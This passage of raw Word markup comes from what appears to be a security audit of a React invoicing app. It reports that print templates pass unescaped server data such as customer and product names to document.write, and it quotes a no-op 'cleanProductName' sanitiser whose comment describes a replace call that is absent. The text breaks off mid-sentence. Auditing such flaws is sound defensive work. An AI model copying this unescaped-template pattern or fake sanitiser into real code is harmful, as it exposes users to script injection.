                <v:shape id="Shape 680" style="position:absolute;width:9906;height:1428;left:30384;top:0;" coordsize="990600,142875" path="m9525,0l981075,0c983705,0,985950,930,987810,2784c989670,4645,990600,6893,990600,9525l990600,133350c990600,135976,989670,138224,987810,140084c985950,141939,983705,142869,981075,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 683" style="position:absolute;width:13335;height:1428;left:0;top:1714;" coordsize="1333500,142875" path="m9525,0l1323975,0c1326605,0,1328850,930,1330710,2784c1332570,4645,1333500,6893,1333500,9525l1333500,133350c1333500,135976,1332570,138224,1330710,140084c1328850,141939,1326605,142869,1323975,142875l9525,142875c6895,142869,4650,141939,2790,140084l0,133350l0,9525l2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 686" style="position:absolute;width:12763;height:1428;left:16002;top:1714;" coordsize="1276350,142875" path="m9525,0l1266825,0c1269455,0,1271700,930,1273560,2784c1275420,4645,1276350,6893,1276350,9525l1276350,133350c1276350,135976,1275420,138224,1273560,140084c1271700,141939,1269455,142869,1266825,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>they</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are assembled as template strings and handed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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in a new window, at seven call sites including </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateInvoice.jsx:1751</w:t>
      </w:r>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SalesHistory.jsx:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1011 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26D4348F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"/>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Those templates interpolated server data raw: customer name, customer phone, cashier name, department name and address, product name, and the free-text invoice note.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F12A37" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="209"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535A51E4" wp14:editId="4B046A66">
                <wp:extent cx="6480126" cy="1924729"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26916" name="Group 26916"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1924729"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1924729"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="653" name="Shape 653"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="248329"/>
                            <a:ext cx="6480126" cy="1228725"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="1228725">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="1223690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="1227268"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="1228235"/>
                                  <a:pt x="6470001" y="1228719"/>
                                  <a:pt x="6467474" y="1228725"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="1228725"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="1228719"/>
                                  <a:pt x="14094" y="1228235"/>
                                  <a:pt x="11760" y="1227268"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="1226300"/>
                                  <a:pt x="7366" y="1224924"/>
                                  <a:pt x="5580" y="1223144"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="1221352"/>
                                  <a:pt x="2417" y="1219293"/>
                                  <a:pt x="1450" y="1216961"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1209675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11757"/>
                                </a:ln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691" name="Rectangle 691"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1799046" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="006F5800" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">And the one function that </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="692" name="Rectangle 692"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1352699" y="0"/>
                            <a:ext cx="465138" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="02147721" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:i/>
                                </w:rPr>
                                <w:t>looked</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="693" name="Rectangle 693"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1702445" y="0"/>
                            <a:ext cx="1991575" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="17C3B1F5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> like a </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:t>sanitiser</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:t xml:space="preserve"> was a no-op:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="694" name="Rectangle 694"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="393830"/>
                            <a:ext cx="3114770" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0432CF13" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">// </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>src</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>/pages/Invoice/CreateInvoice.jsx:1299</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="695" name="Rectangle 695"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="565280"/>
                            <a:ext cx="3114770" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7D01AC43" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">const </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>cleanProductName</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> = (</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>productName</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>) =&gt; {</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="696" name="Rectangle 696"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="746255"/>
                            <a:ext cx="144873" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="13C6FA2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697" name="Rectangle 697"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="746255"/>
                            <a:ext cx="2028222" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="15222EFA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">if </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>(!</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>productName</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>) return "";</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="698" name="Rectangle 698"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="917705"/>
                            <a:ext cx="144873" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="131A83A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699" name="Rectangle 699"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="917705"/>
                            <a:ext cx="4708373" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F2A3694" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>// Remove everything inside parentheses including the parentheses</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="700" name="Rectangle 700"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1089155"/>
                            <a:ext cx="144873" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="44E7489F"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701" name="Rectangle 701"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="209699" y="1089155"/>
                            <a:ext cx="4563500" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="78EA5D60" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">return </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>productName</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">            // &lt;- that is the entire function</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25498" name="Rectangle 25498"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1260611"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5DCB53BC"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25499" name="Rectangle 25499"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="155220" y="1260611"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4220D756"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703" name="Rectangle 703"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1628775"/>
                            <a:ext cx="2087918" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5B5FB3C1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Its own comment describes a </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="704" name="Shape 704"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1571625" y="1610404"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4645"/>
                                  <a:pt x="638175" y="6893"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126451"/>
                                  <a:pt x="637245" y="128693"/>
                                  <a:pt x="635385" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132414"/>
                                  <a:pt x="631280" y="133344"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>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05" name="Rectangle 705"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1596926" y="1634058"/>
                            <a:ext cx="775211" cy="140105"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1F84A2AA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>.replace</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>()</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="706" name="Rectangle 706"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2206823" y="1628775"/>
                            <a:ext cx="5296480" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="30616C4B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> that is not there. This made it the most dangerous line in the file: a reviewer</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="707" name="Rectangle 707"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1800225"/>
                            <a:ext cx="508993" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
